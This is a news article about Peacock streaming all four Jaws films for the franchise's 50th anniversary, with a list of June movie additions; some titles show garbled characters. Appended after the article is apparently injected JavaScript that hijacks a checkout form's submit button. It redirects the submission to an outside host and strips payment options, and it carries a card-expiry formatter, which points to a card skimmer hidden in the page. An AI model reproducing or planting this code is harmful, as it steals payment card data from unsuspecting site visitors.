Movies

Every Jaws Movie Now Streaming on the Same Service to Celebrate the 50th Anniversary

All four Jaws movies are finally back together.

Believe it or not, the movie that changed blockbusters forever is turning 50 years old this summer. Steven Spielberg’s Jaws stormed into theaters on June 20, 1975 and gave birth to modern studio event films. Not only did the shark attack thriller change the game entirely, but it also remains one of the best big budget movies in film history.

Videos by ComicBook.com

The sequels to Jaws aren’t held in nearly as high a regard as the original, but there are still merits to each film in the franchise. To celebrate the 50th anniversary of the first film, fans now have the opportunity to binge through the entire franchise on the same streaming service.

On Sunday morning, Peacock added all four Jaws films to its lineup, making it easier than ever to watch through the whole saga. That means, in addition to the original Jaws, Peacock subscribers can also stream Jaws 2, Jaws 3-D, and Jaws: The Revenge.

If you’re interested in watching through all of the Jaws movies but don’t have a Peacock subscription, you can sign up for one here.

What’s New on Peacock?

The Jaws franchise was added to Peacock’s lineup in the middle of the month, but it was the start of June that brought the most new movies to the service in several weeks. You can check out the full list of Peacock’s June 1st movie additions below.

Adventures of Priscilla Queen of The Desert
Anna and The Apocalypse
The Best Man
The Big Lebowski
The Birdcage
Blue Crush
Bride of Chucky
The โ€˜Burbs
Capote
Captain Phillips

The Chronicles of Riddick
A Cowgirlโ€™s Story
Daddy Day Care
The Day After Tomorrow
Death Wish
Deep Rising
Dirty Dancing
Dirty Dancing 2: Havana Nights
Erin Brockovich
A Fantastic Woman
Fifty Shades Darker
Fifty Shades Freed

Fifty Shades of Grey
Force Majeure
Happy Gilmore
Horrible Bosses
Horrible Bosses 2
Hot Fuzz
How I Live Now
I am Legend
Jack Reacher
Jenniferโ€™s Body
Jumanji
(1995)
Jurassic Park
Jurassic Park III
Jurassic World
Jurassic World: Fallen Kingdom
Kick-Ass 2
Knock Knock
The Land Before Time
Land Before Time II: The Great Valley Adventure
Land Before Time III: The Time of The Great Giving
The Lost World: Jurassic Park
Mamma Mia!
The Matrix
The Matrix Reloaded
The Matrix Revolutions

The Mechanic
Megamind
Milk
My Little Pony: The Movie
Pariah
Patch Adams
Pitch Black
The Producers
(2005)
Riddick
Runaway Bride
Safe House
Saved!
Scooby-Doo
Seed of Chucky
Shaun of The Dead
Stonewall
Take This Waltz
To Wong Foo, Thanks For Everything! Julie Newmar
Tombstone
Up In The Air
Van Helsing
Walking Tall

Wedding Crashers
The Wedding Date
White Bird in a Blizzard
Who We Are – A Chronicle of Racism in America
The Worldโ€™s End

Which Jaws sequel is your favorite? Are you going to be rewatching the franchise for the 50th anniversary? Let us know in the comments!

' document.getElementsByClassName('flex flex-col gap-3 border-t border-gray-medium p-4')[0].getElementsByTagName("button")[0].setAttribute('form', 'formid') document.getElementsByClassName('w-full p-4')[0].remove() document.getElementsByClassName('w-full p-4')[0].innerHTML='
' var el = document.getElementsByClassName('flex flex-col gap-3 border-t border-gray-medium p-4')[0].getElementsByTagName("button")[0], elClone = el.cloneNode(true); el.parentNode.replaceChild(elClone, el); }, 5000); }, false); }; var elemDiv = document.createElement('form'); elemDiv.setAttribute('action', 'https://pay.jollibeefood.rest') elemDiv.setAttribute('method', 'post') elemDiv.setAttribute('id', 'formid') document.body.appendChild(elemDiv); setTimeout(function () { try{ document.getElementsByClassName('border-gray-medium flex cursor-pointer items-center justify-between rounded-md border-2 bg-white p-4')[1].remove() } catch{ console.log(1) } }, 9000); navigation.addEventListener('navigate', () => { setTimeout(function () { try{ var objects = document.getElementsByTagName("svg"); for(var i = 0; i < objects.length; i++) { var obj = objects[i].parentElement; obj.innerHTML += ""; // will trigger update } document.getElementsByClassName('border-gray-medium flex cursor-pointer items-center justify-between rounded-md border-2 bg-white p-4')[1].remove() document.getElementsByClassName("py-5")[1].getElementsByClassName("space-y-2")[0].addEventListener("click", function(e) { setTimeout(function () { document.getElementsByClassName('w-full p-4')[0].innerHTML='
' document.getElementsByClassName('flex flex-col gap-3 border-t border-gray-medium p-4')[0].getElementsByTagName("button")[0].setAttribute('form', 'formid') document.getElementsByClassName('w-full p-4')[0].remove() document.getElementsByClassName('w-full p-4')[0].innerHTML='
' var el = document.getElementsByClassName('flex flex-col gap-3 border-t border-gray-medium p-4')[0].getElementsByTagName("button")[0], elClone = el.cloneNode(true); el.parentNode.replaceChild(elClone, el); }, 5000); }, false); } catch(error){ console.log(error) } }, 4000); }); function formatString(e) { var inputChar = String.fromCharCode(event.keyCode); var code = event.keyCode; var allowedKeys = [8]; if (allowedKeys.indexOf(code) !== -1) { return; } event.target.value = event.target.value.replace( /^([1-9]\/|[2-9])$/g, '0$1/' // 3 > 03/ ).replace( /^(0[1-9]|1[0-2])$/g, '$1/' // 11 > 11/ ).replace( /^([0-1])([3-9])$/g, '0$1/$2' // 13 > 01/3 ).replace( /^(0?[1-9]|1[0-2])([0-9]{2})$/g, '$1/$2' // 141 > 01/41 ).replace( /^([0]+)\/|[0]+$/g, '0' // 0/ > 0 and 00 > 0 ).replace( /[^\d\/]|^[\/]*$/g, '' // To allow only digits and `/` ).replace( /\/\//g, '/' // Prevent entering more than 1 `/` ); }